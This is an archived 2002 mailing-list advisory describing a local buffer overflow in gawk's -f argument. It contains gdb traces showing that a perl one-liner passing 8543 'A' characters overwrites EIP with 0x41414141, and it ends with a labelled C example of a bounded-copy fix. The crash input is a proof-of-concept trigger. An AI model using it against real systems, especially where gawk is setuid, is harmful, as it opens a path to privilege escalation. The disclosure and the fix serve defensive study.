Message-ID: <200211290650.gAT6oJgX052483@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Gawk Overflow
Dear List,
We have extensively researched this problem in Gawk, and now have
deemed it to be a security hole. Details follow.
# cat ESgawk.txt
<-----]research!!![----->
Electronic Souls > Security Bug @!%^#%!^&#%@!(*#$@)($)*@(&$@(*$&@@$^&$#@
vux[ES] & gnome_ present: /bin/gawk, /usr/bin/gawk local buffer overflow !!
I have information (from gnome_) that the gawk program is suid on Slackware Linux.
--> RedHat Linux 6.2 testing:
[pom@...t pom]$ gdb /bin/gawk core
GNU gdb 4.17.0.11 with Linux support
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
Core was generated by `gawk -f AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 6, Aborted.
Reading symbols from /lib/libm.so.6...done.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x40054d21 in __kill ()
(gdb) i r
eax: 0x0 0
ecx: 0x6 6
edx: 0x401261cc 1074946508
ebx: 0xa23 2595
esp: 0xbfffae9c -1073762660
ebp: 0xbfffaeac -1073762644
esi: 0xbfffb0f3 -1073762061
edi: 0xbfffaec4 -1073762620
eip: 0x40054d21 1074089249
eflags: 0x207 IOPL: 0; flags: CF PF IF
orig_eax: 0x25 37
cs: 0x23 35
ss: 0x2b 43
ds: 0x2b 43
es: 0x2b 43
fs: 0x2b 43
gs: 0x2b 43
(gdb)
(gdb) r -f `perl -e'print "A"x8543'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /bin/gawk -f `perl -e'print "A"x8543'`
Program received signal SIGSEGV, Segmentation fault.
strcpy (dest=0xbfffb123 'A' <repeats 200 times>...,
src=0x41414141 <Address 0x41414141 out of bounds>)
at ../sysdeps/generic/strcpy.c:37
./sysdeps/generic/strcpy.c:37: No such file or directory.
(gdb)i r
eax: 0x7ebe6fe2 2126409698
ecx: 0x7ebe6fe1 2126409697
edx: 0x41414141 1094795585
ebx: 0xbfffb123 -1073762013
esp: 0xbfffb0f4 -1073762060
ebp: 0xbfffb0f8 -1073762056
esi: 0xbfffb123 -1073762013
edi: 0xbfffb114 -1073762028
eip: 0x400947a1 1074349985
eflags: 0x10a06 IOPL: 0; flags: PF IF OF RF
orig_eax: 0xffffffff -1
cs: 0x23 35
ss: 0x2b 43
ds: 0x2b 43
es: 0x2b 43
fs: 0x0 0
gs: 0x0 0
--> PhatLinux testing:
(gdb)
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-mandrake-linux"...
(no debugging symbols found)...
(gdb) r -f `perl -e'print "A"x8543'`
Starting program: /bin/gawk -f `perl -e'print "A"x8543'`
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax 0xffffffff -1
ecx 0x24 36
edx 0x24 36
ebx 0xfffffffa -6
esp 0xbfffd174 0xbfffd174
ebp 0x0 0x0
esi 0x0 0
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10282 66178
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb)
h4h4 - (c) 2002 vux //fEAr!
greetz to: gnome_, Brain Storm[ES] & ES-team.
fuckz to : Nia*[ES], CraigTM[ES].
#
Be sure to patch immediately.
The Electronic Souls Crew
[ElectronicSouls] (c) 2002
"People get drunk drinking alcohol."
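As an added illustration (not gawk's own code and not part of the post above): the crash shown in the traces is an unbounded strcpy() of the -f argument into a fixed-size buffer, and the fix is a bounded copy that rejects anything that does not fit. PROGFILE_MAX, the function names and the 8543-byte "A" input are constructed for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed size of the buffer that receives the -f argument; the
 * advisory's 8543-byte argument is far larger than any such buffer. */
#define PROGFILE_MAX 1024

/* Bounded replacement for strcpy(dst, arg). Returns 0 and NUL-terminates
 * dst on success; -1 with errno = ENAMETOOLONG if arg would not fit, or
 * errno = EINVAL for bad pointers. strnlen() stops at dstsz, so a huge
 * or unterminated input is never scanned to its end. */
int copy_progfile_arg(const char *arg, char *dst, size_t dstsz)
{
    if (arg == NULL || dst == NULL || dstsz == 0) { errno = EINVAL; return -1; }
    size_t n = strnlen(arg, dstsz);
    if (n >= dstsz) {          /* no room for the terminating NUL */
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(dst, arg, n + 1);   /* n + 1 <= dstsz, copies the NUL too */
    return 0;
}

/* 0 if a -f argument fits the PROGFILE_MAX buffer, -1 if it would overrun it. */
int progfile_arg_fits(const char *arg)
{
    char buf[PROGFILE_MAX];
    return copy_progfile_arg(arg, buf, sizeof buf);
}

/* The advisory's input, "A" repeated len times (heap allocated, caller frees). */
char *make_a_string(size_t len)
{
    char *s = malloc(len + 1);
    if (s != NULL) { memset(s, 'A', len); s[len] = '\0'; }
    return s;
}

int main(void)
{
    char *big = make_a_string(8543);
    printf("prog.awk: %s\n", progfile_arg_fits("prog.awk") == 0 ? "accepted" : "rejected");
    printf("A x 8543: %s\n", progfile_arg_fits(big) == 0 ? "accepted" : "rejected");
    free(big);
    return 0;
}
```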